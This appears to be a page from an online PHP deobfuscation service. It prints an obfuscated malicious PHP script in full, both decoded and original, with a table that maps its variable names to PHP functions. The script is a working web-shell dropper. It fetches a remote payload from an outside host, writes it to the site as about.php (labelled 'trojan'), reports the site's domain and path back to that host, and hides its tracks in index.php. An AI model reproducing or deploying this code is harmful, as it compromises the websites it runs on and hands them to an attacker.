Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php $O00OO_0_O_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6..

Decoded Output download

<?php  
$O00OO_0_O_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O000OOO___=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{16}.$O00OO_0_O_{18}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33};$O_0O_0O0O_=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{27}.$O00OO_0_O_{30}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33};$O0_O0_O0O_=$O00OO_0_O_{32}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{6}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{38}.$O00OO_0_O_{18}.$O00OO_0_O_{0}.$O00OO_0_O_{32}.$O00OO_0_O_{10}.$O00OO_0_O_{12}.$O00OO_0_O_{35}.$O00OO_0_O_{0};$OOO0_O0_0_=$O00OO_0_O_{3}.$O00OO_0_O_{6}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{22}.$O00OO_0_O_{36}.$O00OO_0_O_{29}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{26}.$O00OO_0_O_{30};$OO0O___0O0=$O00OO_0_O_{3}.$O00OO_0_O_{6}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{22}.$O00OO_0_O_{36}.$O00OO_0_O_{29}.$O00OO_0_O_{26}.$O00OO_0_O_{30}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{26}.$O00OO_0_O_{30};$O_O_0_O00O=$O00OO_0_O_{16}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{27}.$O00OO_0_O_{29}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{16}.$O00OO_0_O_{23}.$O00OO_0_O_{6}.$O00OO_0_O_{32}.$O00OO_0_O_{30};$O_00O0OO__=$O00OO_0_O_{33}.$O00OO_0_O_{10}.$O00OO_0_O_{24}.$O00OO_0_O_{29}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{16}.$O00OO_0_O_{23}.$O00OO_0_O_{6}.$O00OO_0_O_{32}.$O00OO_0_O_{30};$O_0_O0_O0O=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{10}.$O00OO_0_O_{35}.$O00OO_0_O_{16}.$O00OO_0_O_{10};$O_O_O000_O=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{23}.$O00OO_0_O_{35}.$O00OO_0_O_{33}.$O00OO_0_O_{30};$O___00OO0O=$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{24}.$O00OO_0_O_{12}.$O00OO_0_O_{6}.$O00OO_0_O_{23}.$O00OO_0_O_{12}.$O00OO_0_O_{2}.$O00OO_0_O_{30};$O__0O0_0OO=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{12}.$O00OO_0_O_{0}.$O00OO_0_O_{12}.$O00OO_0_O_{10};$O_OO_O000_=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{30}.$O00OO_0_O_{17}.$O00OO_0_O_{30}.$O00OO_0_O_{32};$OO0O0__O0_=${"GLOBALS"}["O0_O0_O0O_"]('$O__O00_OO0=\'\'','if(isset(${"_SERVER"}["HTTP_HOST"])){return ${"_SERVER"}["HTTP_HOST"];}elseif(isset(${"_SERVER"}["SERVER_NAME"])){return ${"_SERVER"}["SERVER_NAME"];}return $O__O00_OO0;');$OOO_O00_0_=${"GLOBALS"}["O0_O0_O0O_"]('$url','$OO0O0_0_O_=@${"GLOBALS"}["O_0O_0O0O_"]($url);if(!$OO0O0_0_O_){$O0O0_O_0O_=${"GLOBALS"}["O__0O0_0OO"]();${"GLOBALS"}["O_0_O0_O0O"]($O0O0_O_0O_,CURLOPT_URL,$url);${"GLOBALS"}["O_0_O0_O0O"]($O0O0_O_0O_,CURLOPT_RETURNTRANSFER,1);$OO0O0_0_O_=${"GLOBALS"}["O_OO_O000_"]($O0O0_O_0O_);${"GLOBALS"}["O_O_O000_O"]($O0O0_O_0O_);}return $OO0O0_0_O_;');$O_OO__0O00=${"GLOBALS"}["O0_O0_O0O_"]('$O_0O_O_0O0=\'\'','$O_0_O_OO00=array();$O_0_O_OO00["path"]=${"GLOBALS"}["O_00O0OO__"](${"GLOBALS"}["O_00O0OO__"](\'//\',\'/\',${"_SERVER"}["PHP_SELF"]),\'\',${"GLOBALS"}["O_00O0OO__"](\'\\\',\'/\',${"_SERVER"}["SCRIPT_FILENAME"]));$O_0_O_OO00["domain"]=${"GLOBALS"}["OO0O0__O0_"]();$O_0_O_OO00["shell_link"]=${"GLOBALS"}["OO0O___0O0"](\'aHR0cHM6Ly9mcmFua2xpbmNvdmV5LmNvbS5ndC9hYm91dC5waHA/NTIw\');if(isset(${"_GET"}["del"])&&${"_GET"}["del"]=="my_code"){$O0_0OO_O0_=$O_0_O_OO00["path"]."/index.php";$OO0O0O0___=@${"GLOBALS"}["O_0O_0O0O_"]($O0_0OO_O0_);$O_OO_0_0O0=${"GLOBALS"}["OO0O___0O0"]("PFw/cGhwLitcKDFcKTtcPz4=");$OO0O0O0___=${"GLOBALS"}["O_O_0_O00O"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);$OO0O0O0___=@${"GLOBALS"}["O000OOO___"]($O0_0OO_O0_,$OO0O0O0___);if($OO0O0O0___>0){die("delete success");}die("delete failed");}$OO_O__O000=${"GLOBALS"}["OO0O___0O0"]("YWJvdXQucGhw");$O0O_0_O0_O=$O_0_O_OO00["path"]."/".$OO_O__O000;$OO0O0O0___=@${"GLOBALS"}["OOO_O00_0_"](${"GLOBALS"}["OO0O___0O0"]("aHR0cDovLzUxbGEuaXp2NC5jb20vYS50eHQ="));$OO0O0O0___=@${"GLOBALS"}["O000OOO___"]($O0O_0_O0_O,$OO0O0O0___);if($OO0O0O0___>0){$O_0_O_OO00["trojan"]="http://".$O_0_O_OO00["domain"]."/".$OO_O__O000;}else{$O_0_O_OO00["trojan"]="write failed";}$OO_0O00O__=sprintf(${"GLOBALS"}["OO0O___0O0"](\'aHR0cDovLzUxbGEuaXp2NC5jb20vP2Q9JXM=\'),${"GLOBALS"}["OOO0_O0_0_"](${"GLOBALS"}["O___00OO0O"]($O_0_O_OO00)));$O__OO0O00_=${"GLOBALS"}["OOO_O00_0_"]($OO_0O00O__);if($O__OO0O00_=="done"){$O0_0OO_O0_=$O_0_O_OO00["path"]."/index.php";$OO0O0O0___=@${"GLOBALS"}["O_0O_0O0O_"]($O0_0OO_O0_);$O_OO_0_0O0=${"GLOBALS"}["OO0O___0O0"]("PFw/cGhwLitcKDFcKTtcPz4=");$OO0O0O0___=${"GLOBALS"}["O_O_0_O00O"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);@${"GLOBALS"}["O000OOO___"]($O0_0OO_O0_,$OO0O0O0___);}');${"GLOBALS"}["O_OO__0O00"](1); ?>

Did this file decode correctly?

Original Code

<?php 
$O00OO_0_O_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O000OOO___=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{16}.$O00OO_0_O_{18}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33};$O_0O_0O0O_=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{27}.$O00OO_0_O_{30}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33};$O0_O0_O0O_=$O00OO_0_O_{32}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{6}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{38}.$O00OO_0_O_{18}.$O00OO_0_O_{0}.$O00OO_0_O_{32}.$O00OO_0_O_{10}.$O00OO_0_O_{12}.$O00OO_0_O_{35}.$O00OO_0_O_{0};$OOO0_O0_0_=$O00OO_0_O_{3}.$O00OO_0_O_{6}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{22}.$O00OO_0_O_{36}.$O00OO_0_O_{29}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{26}.$O00OO_0_O_{30};$OO0O___0O0=$O00OO_0_O_{3}.$O00OO_0_O_{6}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{22}.$O00OO_0_O_{36}.$O00OO_0_O_{29}.$O00OO_0_O_{26}.$O00OO_0_O_{30}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{26}.$O00OO_0_O_{30};$O_O_0_O00O=$O00OO_0_O_{16}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{27}.$O00OO_0_O_{29}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{16}.$O00OO_0_O_{23}.$O00OO_0_O_{6}.$O00OO_0_O_{32}.$O00OO_0_O_{30};$O_00O0OO__=$O00OO_0_O_{33}.$O00OO_0_O_{10}.$O00OO_0_O_{24}.$O00OO_0_O_{29}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{16}.$O00OO_0_O_{23}.$O00OO_0_O_{6}.$O00OO_0_O_{32}.$O00OO_0_O_{30};$O_0_O0_O0O=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{10}.$O00OO_0_O_{35}.$O00OO_0_O_{16}.$O00OO_0_O_{10};$O_O_O000_O=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{23}.$O00OO_0_O_{35}.$O00OO_0_O_{33}.$O00OO_0_O_{30};$O___00OO0O=$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{24}.$O00OO_0_O_{12}.$O00OO_0_O_{6}.$O00OO_0_O_{23}.$O00OO_0_O_{12}.$O00OO_0_O_{2}.$O00OO_0_O_{30};$O__0O0_0OO=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{12}.$O00OO_0_O_{0}.$O00OO_0_O_{12}.$O00OO_0_O_{10};$O_OO_O000_=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{30}.$O00OO_0_O_{17}.$O00OO_0_O_{30}.$O00OO_0_O_{32};$OO0O0__O0_=${"GLOBALS"}["O0_O0_O0O_"]('$O__O00_OO0=\'\'','if(isset(${"_SERVER"}["HTTP_HOST"])){return ${"_SERVER"}["HTTP_HOST"];}elseif(isset(${"_SERVER"}["SERVER_NAME"])){return ${"_SERVER"}["SERVER_NAME"];}return $O__O00_OO0;');$OOO_O00_0_=${"GLOBALS"}["O0_O0_O0O_"]('$url','$OO0O0_0_O_=@${"GLOBALS"}["O_0O_0O0O_"]($url);if(!$OO0O0_0_O_){$O0O0_O_0O_=${"GLOBALS"}["O__0O0_0OO"]();${"GLOBALS"}["O_0_O0_O0O"]($O0O0_O_0O_,CURLOPT_URL,$url);${"GLOBALS"}["O_0_O0_O0O"]($O0O0_O_0O_,CURLOPT_RETURNTRANSFER,1);$OO0O0_0_O_=${"GLOBALS"}["O_OO_O000_"]($O0O0_O_0O_);${"GLOBALS"}["O_O_O000_O"]($O0O0_O_0O_);}return $OO0O0_0_O_;');$O_OO__0O00=${"GLOBALS"}["O0_O0_O0O_"]('$O_0O_O_0O0=\'\'','$O_0_O_OO00=array();$O_0_O_OO00["path"]=${"GLOBALS"}["O_00O0OO__"](${"GLOBALS"}["O_00O0OO__"](\'//\',\'/\',${"_SERVER"}["PHP_SELF"]),\'\',${"GLOBALS"}["O_00O0OO__"](\'\\\\\',\'/\',${"_SERVER"}["SCRIPT_FILENAME"]));$O_0_O_OO00["domain"]=${"GLOBALS"}["OO0O0__O0_"]();$O_0_O_OO00["shell_link"]=${"GLOBALS"}["OO0O___0O0"](\'aHR0cHM6Ly9mcmFua2xpbmNvdmV5LmNvbS5ndC9hYm91dC5waHA/NTIw\');if(isset(${"_GET"}["del"])&&${"_GET"}["del"]=="my_code"){$O0_0OO_O0_=$O_0_O_OO00["path"]."/index.php";$OO0O0O0___=@${"GLOBALS"}["O_0O_0O0O_"]($O0_0OO_O0_);$O_OO_0_0O0=${"GLOBALS"}["OO0O___0O0"]("PFw/cGhwLitcKDFcKTtcPz4=");$OO0O0O0___=${"GLOBALS"}["O_O_0_O00O"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);$OO0O0O0___=@${"GLOBALS"}["O000OOO___"]($O0_0OO_O0_,$OO0O0O0___);if($OO0O0O0___>0){die("delete success");}die("delete failed");}$OO_O__O000=${"GLOBALS"}["OO0O___0O0"]("YWJvdXQucGhw");$O0O_0_O0_O=$O_0_O_OO00["path"]."/".$OO_O__O000;$OO0O0O0___=@${"GLOBALS"}["OOO_O00_0_"](${"GLOBALS"}["OO0O___0O0"]("aHR0cDovLzUxbGEuaXp2NC5jb20vYS50eHQ="));$OO0O0O0___=@${"GLOBALS"}["O000OOO___"]($O0O_0_O0_O,$OO0O0O0___);if($OO0O0O0___>0){$O_0_O_OO00["trojan"]="http://".$O_0_O_OO00["domain"]."/".$OO_O__O000;}else{$O_0_O_OO00["trojan"]="write failed";}$OO_0O00O__=sprintf(${"GLOBALS"}["OO0O___0O0"](\'aHR0cDovLzUxbGEuaXp2NC5jb20vP2Q9JXM=\'),${"GLOBALS"}["OOO0_O0_0_"](${"GLOBALS"}["O___00OO0O"]($O_0_O_OO00)));$O__OO0O00_=${"GLOBALS"}["OOO_O00_0_"]($OO_0O00O__);if($O__OO0O00_=="done"){$O0_0OO_O0_=$O_0_O_OO00["path"]."/index.php";$OO0O0O0___=@${"GLOBALS"}["O_0O_0O0O_"]($O0_0OO_O0_);$O_OO_0_0O0=${"GLOBALS"}["OO0O___0O0"]("PFw/cGhwLitcKDFcKTtcPz4=");$OO0O0O0___=${"GLOBALS"}["O_O_0_O00O"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);@${"GLOBALS"}["O000OOO___"]($O0_0OO_O0_,$OO0O0O0___);}');${"GLOBALS"}["O_OO__0O00"](1); ?>

Function Calls

null	1
urldecode	1

Variables

$O000OOO___	file_put_contents
$O00OO_0_O_	n1zb/ma5\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j
$O0_O0_O0O_	create_function
$OO0O___0O0	base64_decode
$OOO0_O0_0_	base64_encode
$O_00O0OO__	str_replace
$O_0O_0O0O_	file_get_contents
$O_0_O0_O0O	curl_setopt
$O_OO_O000_	curl_exec
$O_O_0_O00O	preg_replace
$O_O_O000_O	curl_close
$O__0O0_0OO	curl_init
$O___00OO0O	serialize

Stats

MD5	847d89f2247a0f2b484304c194922081
Eval Count	0
Decode Time	210 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats